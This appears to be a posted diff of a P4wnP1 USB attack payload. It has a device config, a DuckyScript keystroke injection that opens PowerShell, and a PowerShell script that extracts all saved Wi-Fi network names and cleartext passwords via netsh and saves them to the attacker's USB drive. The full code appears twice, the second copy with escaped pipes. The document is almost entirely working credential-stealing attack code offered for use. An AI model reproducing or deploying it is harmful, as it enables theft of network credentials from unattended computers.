tmap · December 12, 2017 14:10
diff --git a/payload.txt b/payload.txt
 #P4wnP1
 # ==========================
 #
 # Steals wifi passwords from unlocked computers
 # freely inspired by https://github.com/mame82/P4wnP1/tree/master/payloads/hakin9_tutorial

 UMSLABEL="WIFI"
 fatlabel $wdir/USB_STORAGE/image.bin $UMSLABEL

 # =============================
 # USB setup
 # =============================
 USB_VID="0x1d6b"    # Vendor ID
 USB_PID="0x1002"    # Product ID
 USE_ECM=false       # we need no Linux/Mac networking
 USE_RNDIS=true      # RNDIS network device to enable hash stealing
 USE_HID=true        # HID keyboard to allow entering cracked password
 USE_UMS=true # enable USB Mass Storage

 lang="sv" # MAKE THE KEYBOARD LANGUAGE MATCH THE TARGET

 function onKeyboardUp()
 {
        # execute DuckyScript responsible for bringing up PowerShell
        cat $wdir/payloads/wifi_passwd/startps.duck | duckhid


        cat $wdir/payloads/wifi_passwd/stealwifi.ps1 | outhid
 }
diff --git a/startps.duck b/startps.duck
 GUI r
 DELAY 500
 STRING powershell.exe
 ENTER
 DELAY 1000
diff --git a/stealwifi.ps1 b/stealwifi.ps1
 $drivefound=$false
 while (-not $drivefound)
 {
    try
    {
        $drive=Get-Volume -FileSystemLabel "WIFI" -ErrorAction Stop
    }
    catch
    {
        "Waiting for P4wnP1 drive"
        sleep 1
        continue
    }
    $dl=($drive.DriveLetter | Out-String)[0] +":"
    $drivefound=$true
 }

 # put ya payload below

 $filename=$dl+"\"+$env:COMPUTERNAME+"_"+$env:USERNAME+".txt"
 $WirelessSSIDs = (netsh wlan show profiles | Select-String ': ' ) -replace ".*:\s+"
 $WifiInfo = foreach($SSID in $WirelessSSIDs) {
    $Password = (netsh wlan show profiles name=$SSID key=clear | Select-String 'Key Content') -replace ".*:\s+"
    New-Object -TypeName psobject -Property @{"SSID"=$SSID;"Password"=$Password}
 }
 $WifiInfo | Out-File $filename
 exit
	#P4wnP1
	# ==========================
	#
	# Steals wifi passwords from unlocked computers
	# freely inspired by https://github.com/mame82/P4wnP1/tree/master/payloads/hakin9_tutorial

	UMSLABEL="WIFI"
	fatlabel $wdir/USB_STORAGE/image.bin $UMSLABEL

	# =============================
	# USB setup
	# =============================
	USB_VID="0x1d6b" # Vendor ID
	USB_PID="0x1002" # Product ID
	USE_ECM=false # we need no Linux/Mac networking
	USE_RNDIS=true # RNDIS network device to enable hash stealing
	USE_HID=true # HID keyboard to allow entering cracked password
	USE_UMS=true # enable USB Mass Storage

	lang="sv" # MAKE THE KEYBOARD LANGUAGE MATCH THE TARGET

	function onKeyboardUp()
	{
	# execute DuckyScript responsible for bringing up PowerShell
	cat $wdir/payloads/wifi_passwd/startps.duck \| duckhid


	cat $wdir/payloads/wifi_passwd/stealwifi.ps1 \| outhid
	}
	$drivefound=$false
	while (-not $drivefound)
	{
	try
	{
	$drive=Get-Volume -FileSystemLabel "WIFI" -ErrorAction Stop
	}
	catch
	{
	"Waiting for P4wnP1 drive"
	sleep 1
	continue
	}
	$dl=($drive.DriveLetter \| Out-String)[0] +":"
	$drivefound=$true
	}

	# put ya payload below

	$filename=$dl+"\"+$env:COMPUTERNAME+"_"+$env:USERNAME+".txt"
	$WirelessSSIDs = (netsh wlan show profiles \| Select-String ': ' ) -replace ".*:\s+"
	$WifiInfo = foreach($SSID in $WirelessSSIDs) {
	$Password = (netsh wlan show profiles name=$SSID key=clear \| Select-String 'Key Content') -replace ".*:\s+"
	New-Object -TypeName psobject -Property @{"SSID"=$SSID;"Password"=$Password}
	}
	$WifiInfo \| Out-File $filename
	exit